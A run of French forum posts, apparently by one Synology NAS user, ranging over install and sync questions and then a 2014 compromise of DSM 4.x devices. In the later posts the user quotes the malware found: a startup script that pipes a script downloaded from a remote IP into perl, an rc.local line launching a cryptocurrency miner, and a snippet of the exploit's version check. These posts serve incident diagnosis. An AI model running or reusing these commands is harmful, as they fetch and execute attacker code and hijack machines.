lejurassien45

Quand j'essai d'installer flarum j'ai un problème avec unzip donc il crée flarum mais sans droits du tout et sur touts les fichiers flarum ------- https://imgur.com/g2r1W3d je lance cette commande php72 /usr/bin/composer create-project flarum/flarum --stability=beta As there is no 'unzip' command installed zip files are being unpacked using the PHP zip extension. This may cause invalid reports of corrupted archives. Besides, any UNIX permissions (e.g. executable) defined in the archives will be lost. Installing 'unzip' may remediate them. l'extension php zip.so est installé(sinon j'aurais pas le message d'erreur qui dit qu'il va utiliser php zip) je sais pas si il est possible d'installer unzip d'une manière ou d'une autre sur synology...? php72 --ini Configuration File (php.ini) Path: /usr/local/etc/php72/cli Loaded Configuration File: /usr/local/etc/php72/cli/php.ini Scan for additional .ini files in: /usr/local/etc/php72/cli/conf.d Additional .ini files parsed: /usr/local/etc/php72/cli/conf.d/extension.ini mes extensions: /usr/local/etc/php72/cli/conf.d extension = bcmath.so extension = bz2.so extension = calendar.so extension = curl.so extension = dba.so extension = exif.so extension = ftp.so extension = gd.so extension = gettext.so extension = gmp.so extension = iconv.so extension = imap.so extension = intl.so extension = ldap.so extension = mailparse.so extension = mysqli.so extension = openssl.so extension = pdo_dblib.so extension = pdo_mysql.so extension = pdo_pgsql.so extension = pdo_sqlite.so extension = pgsql.so extension = phar.so extension = posix.so extension = shmop.so extension = soap.so extension = sockets.so extension = sqlite3.so extension = ssh2.so extension = sysvmsg.so extension = sysvsem.so extension = sysvshm.so extension = wddx.so extension = xmlrpc.so extension = xsl.so extension = zip.so

Tu peux utiliser connections à distance en webdav ,ftp,sftp .... Filestation>outils>configurer une connection à distance. bonne continuation

Il faut aller dans l'interface web de syncthing ..cliquer sur actions>configurations>et là il y a une case à cocher pour la mise à jour automatique. En espérant que ça t'aide....bonne continuation!

Merci beaucoup pour le suivi et tout fonctionne immpec!!!

Peut-être que tu trouveras ton bonheur ICI...

Et comment tu fais pour mettre 6 chiffres quand il est demandé de mettre aussi des lettres???

Faut peut-être attendre que t411 sorte des choux (les serveurs fonctionnent quand ils peuvent,presque à chaques fois j'ai un message qui dit qu'aucun serveur n'est dispo!) Et ensuite on pourra faire d'autres essais. Pour info ça fait une semaine environ que mon upload est très lent ce qui n'est pas du tout habituel..et sur le site un tas de personnes ont des problèmes en utilisant les logiciels de p2p recommandés ,alors nous avec nos "bidouilles" ont est pas sorti de l'auberge. Patience et ça reviendra à la normal. Et cette fonction de recherche et téléchargement est un plus mais avec downloadstation et compagnion t411 (le tout sur android) permet de faire la même chose en attendant que tout se calme. à bientôt...

vide ton cache navigateur peut-être... et va jetter un oeil sur ta base de données phpmyadmin... ici il y a peut-être un truc qui t'aidera.. http://synologeek.ddns.net/2012/04/comment-changer-les-permaliens-de-wordpress/

Je viens d'utiliser ce qui est expliqué ici suite au problème de noip!! Tout c'est très bien passé!

J'ai pas dit le contraire catimini,mais ne pratiquant pas rsync j'ai filé ma solution qui me convient très bien et rsync sur windows c'est possible mais avec cygwin,deltacopy,cwrync...et comme mickey veut sync entre un pc et syno ça m'a semblé juste...voilà enfin chacuns fait ce qui lui convient le mieux et vive la différence. En fait j'utiliserais freefilesync entre le pc et le dossier du syno qui serait monté avec samba sur le pc pour s'occuper de la syncro et ensuite rsync entre les deux hdd du syno. un petit lien interresant: http://neosting.net/freefilesync-synchroniser-et-sauvegarder-vos-donnees-librement

Regarde avec freefilesync il y a même moyen de faire des scripts batch que tu peux lancer avec crontab ou le gestionnaire des tâches de windows.

On est là pour s'entre aider non?? Pas se bouffer le nez!!

Ok,j'avais pas compris ça comme ça,désolé....

Encore un intermediaire dont ont ne sait pas grand choses,donc une faille potentielle en plus. C'est quand même pas compliqué de creer une adresse dyndns ou autre et d'ouvrir le ou les ports voulus...non? Moi j'ai un accès à videostation audio.. photo..downloadmanager etc... sans problèmes depuis mon chalet dans la forêt et ce en 3g 4g avec juste le port et le 5000. Moins il y a de redirection de ports ouverts et d'appli qui une fois mise à jour tout à coup ne fonctionne plus genre quickconnect et mieux on se porte! Je porte pas de jugement,pourvu que chacun trouve midi à sa porte.

Oui tu as raison,l'upnp est un gruyère et même windows propose de le désactiver c'est pour dire! Tu peux aussi désactiver le nat-pmp sur ton routeur.. uPnP est une "norme maison Microsoft" (à l'origine, uniquement dans Windows XP, mais qui s'est répendue) qui affecte tous les systèmes Windows depuis 98, 98se, 2000, ME, XP et ultérieurs, d'origine ou par le biais des mises à jour (update), sous la forme d'un service nommé SSDP Discovery Service. Il écoute sur le port TCP 5000 et le port UDP 1900 pour les datagrammes. Ce dispositif comporte de très nombreuses failles de sécurité et doit être désactivé. En plus, ce dispositif n'est, n'y plus n'y moins, qu'un espion faisant l'inventaire de votre configuration.

Ce matin,petit mail du syno: L'adresse IP [61.147.103.175] (adresse chinoise) a eu 5 tentatives échouées en essayant de ce connecter à SSH exécutée sur synology dans un intervalle de 5 minutes, et elle a été bloquée à Sun Feb 16 08:12:23 2014. C'est donc "aussi"par ssh que ça se passe,et je n'ai pas de port autre que et 5000 d'ouverts je me demande donc une chose,est-ce possible d'invoquer le ssh via le port sans avoir de script ou autres qui attend sagement "que quelqu'un" vienne lui demandé de s'executer???? Et ensuite je m'interroge aussi sur dyndns et surtout sur le script dyndns.login.sh que certains dont moi ont installé pour éviter de devoir ce rendre sur son compte dyndns une fois par mois afin d'éviter la non diffusion de son adresse dyndns. Mais je vois que certains non pas de site web ni d'adresse dyndns donc je suppose que c'est sûrement une fausse piste... En touts cas c'est pas fini pour eux,ils essayent encore de toucher certains syno qui l'ont déjà été! Perso je vais fermer le ssh (ce qui me les brisent unn peu) en attendant que ça se calme et je n'ai aucuns conseils à donner mais une désactivation du compte admin,remise en place de mots de passe différents,mise à jour en 4.3.3827,ainsi que la fermeture du ssh me semble un minimum. Un bon dimanche à tous Edit: J'ai faits le tour du proprio histoire de voir si comme la dernière fois l'heure de l'attaque était sur un dossier ou fichiers et surprise,à la même heure 8h12 un fichier à été lu ou autres choses et il s'agit du fichier /etc/synoinfo.conf. (et je roupillais donc je sais pas trop, d'un côté je suis averti d'un blocage et d'un autre je vois un fichiers qui à été utilisé (j'imagine quand essayant de se connecter sur ssh c'est ce fichier qui entre en jeu d'où sont utilisation?? (du moins je l'espère!) sinon rien d'autres à signaler. Edit2: Tout ca me fait penser que je sais même pas ce qu'est un miner bitcoin et à quoi il sert au juste....pour ceux qui sont curieux comme moi voici un lien assez explicite et en francais (si si c'est vrai ) http://www.atlantico.fr/decryptage/mine-bitcoin-c-est-quoi-pierre-noizat-927546.html.

Merki tout plein!! Je surveille pépère et les process qui tourne et je sniff tout ce qui sort avec wireshark,pour l'instant ça roule! A bientôt

Le même quoi?? J'aimerais savoir si tu as bien cette ligne dans etc/shadow smmsp:*:10933:0:99999:7::: et si tu as smmsp:x:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin dans etc/passwd Parce que moi malgré restauration aujourd'hui le 14 ils sont (shadow et passwd) toujours datés du 12. merci à toi!

The one I found (user ‘smmsp’ with multiple PWNEDm process running – actually a program called mined that’s been renamed , no other apparent damage besides tampering with some Synology web-interface files ot hide it’s CPU activity. Seems to all be started form a user called smmsp (Sendmail user – listed in the /etc/passwd file) Effectivement hier j'avais smmsp:x:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin dans /etc/passwd et aujourd'hui il y est encore malgré une reinstallation et la date n'est pas du 14 mais du 12... Quelqu'un peut-il me confirmer que cette ligne dans /etc/passwd est bien légitime s'ils vous plaît??? Et surtout ceci smmsp:*:10933:0:99999:7::: dans /etc/shadow

J'espère que tu as pris la dernière version du dsm qui à été publié aujourd'hui?? 4.3.3827 Avec un patch contre cette caque... si non,il doit être possible d'installer que le patch. Quand à moi sujet résolu,j'ai coupé l'accès au net,fait un double reset et réinstallé le dsm au propre car il y avait trop de fichier touché!! Bonne journée!! Edit: @ mwanico Tu as fait une mise à jour ou une réinstallation?? Parce que via la mise à jour je doute que tu sois débarassé de quoi que ce soit.... En relisant le payload j'ai vu que le fichier redirect.cgi est apparemment propre mais il a été "retouché" avec un éditeur exadécimal et ils se sont réservé un accès.... Je remets le payload,lit le bien c'est très interessant http://www.exploit-db.com/exploits/30470/ case version when '4.0' return Exploit::CheckCode::Vulnerable if build < '2259' when '4.1' return Exploit::CheckCode::Vulnerable when '4.2' return Exploit::CheckCode::Vulnerable if build < '3243' when '4.3' return Exploit::CheckCode::Vulnerable if build < '3810' return Exploit::CheckCode::Detected if build == '3810' end On peut donc en déduire que 4.3.3810 est bel et bien vulnérable!!

Quelqu'un de plus doué que moi doit pouvoir tirer pas mal de choses de ceci!!!! http://www.exploit-d...exploits/30470/ en vla deux qui n'ont rien à foutre dans le fichier host! 127.0.0.1 eventuallydown.dyndns.biz celle là est en rapport avec des images(dans le payload c'est ici qu'est la vulnérabilité /webman/imageSelector.cgi 127.0.0.1 zazti.myftp.org (et comme par hasard celle là mène à nouveau sur apache tomcat comme l'adresse dans le script #post10!)

Le volume statup je ne l'ai vu "enfin il est apparu parce que caché) que quand j'ai voulu créer un nouveau dossier partagé!!

Et comment t'explique que la faille dont tu parles concernant donc le dsm 4.3 m'atteint aussi avec le dsm 4.1.2661?? Ici aussi il y a des "indices" http://forum.synology.com/enu/viewtopic.php?f=19&t=81026 edit: merci quand même,tu m'as évité de faire une mise a jour pour rien. edit: Apparement pas mal de personnes ont utilisé cette faille et on créer chacun sa petite merde!! http://thesbsguy.com/?p=244 Moi j'ai été touché aussi par le script dans un dossier startup (post #10 un peu au dessus) !!! Jusqu'à maintenant j'en était pas sûr mais ici c'est expliqué!! Update: There seems to be two versions. The one I found (user ‘smmsp’ with multiple PWNEDm process running – actually a program called mined that’s been renamed , no other apparent damage besides tampering with some Synology web-interface files ot hide it’s CPU activity. Seems to all be started form a user called smmsp (Sendmail user – listed in the /etc/passwd file) There also seems to be another variant that actively looks for username/passwords in places such as /etc/ddns.conf, adds a folder called /volume1/startup with a Pearl script to activate itself. This one also seems to tamper with some rudimentary command line tools such as ls, cat and top to prevent removal. Edit: Il y a aussi un truc pas clair dans /etc/shadow et etc/passwd cette ligne: smmsp:*:10933:0:99999:7::: Je l'ai recherché dans google et on tombe sur un exploit!! Quel chiotte,maintenant je sais pas trop ce qui est touché ou pas,certain ont constaté pas mal de choses mais c'est un poil compliqué pour moi! Mais voici la page sur laquelle il y a aussi un lien pour télécharger Syno-pwned http://thesbsguy.com/?p=244 trouvé aussi usr/syno/synoman/redirect.cgi qui a été touché à 2h17 comme le process httpd.pid!!!! en voici le contenu: echo -e "Content-Type: text/htmln" [ -n "$1" ] && echo "<html><script type="text/javascript">var URL=location.protocol+"//"+location.hostname+":$1/";location.replace(URL);</script></html>" Celui là dans etc/rc.local aussi touché à la même heure! Et là aucuns doutes!!! /var/run/httpd-log.pid -B -q -o stratum+tcp://46.249.51.175:3339 Encore ici on pige ou est la faille et comment elle est utilisée et en rab on peut voir que tout les dsm 4.x sont touché!!!! http://www.exploit-db.com/exploits/30470/

C'est bien ce que je pensais,mais est-ce qu'une mise à jour du dsm de 4.1 en 4.3 est égale à une reinstallation?? edit: je réponds à ma question (ça peut aider.) I think what you can do at the monment is: - upgrade DSM to latest version (IIRC 4.3 3810-update 4, which has some important security fixes) - reboot the NAS and observe if the rogue processes appear again - if you get them again, re-install DSM (it won't touch your user volumes) once again up to latest update4

Franchement je suis pas sûr que le mot de passe admin/root soit en cause.... Le mien est juste très très spécial (après avoir utilisé backtrack,john,hydra,etc... j'ai mis un mot de passe qui est vraiment sécure,mon routeur (tomato) est très sécurisé(connection à l'administration uniquement en filliaire et https,upnp désactivé,nat pnp désactivé aussi,filtrage mac activé,il n'y a que le port et 5000 d'ouverts. Je suis presque sûr que c'est pas via le login du syno que cette m.... s'installe,mais bien via le port ou 5000 qu'il arrive à passer et ensuite ......beuuuh Perso j'ai vu un nouveau dossier partagé nommé startup et dedans il y avait ceci #!/bin/sh # # # Stop myself if running PIDFILE=/var/run/DiskStation.pid # start() { nohup /usr/syno/bin/curl http://83.170.113.14:8080/browser/start.pl | perl -- & # write pidfile echo $! > $PIDFILE echo "Optware startup myscript" } # stop() { [ -f ${PIDFILE} ] && kill -9 0 # remove pidfile rm -f $PIDFILE echo "Optware shutdown myscript" } # case "$1" in start) start ;; stop) stop ;; restart) stop sleep 1 start ;; *) echo "Usage: $0 (start|stop|restart)" exit 1 ;; esac # End que j'ai viré de suite et il est revenu assez rapidement...je crois que c'est en faisant la mise à jour de init 3rdparty!!! Peut-être le coupable....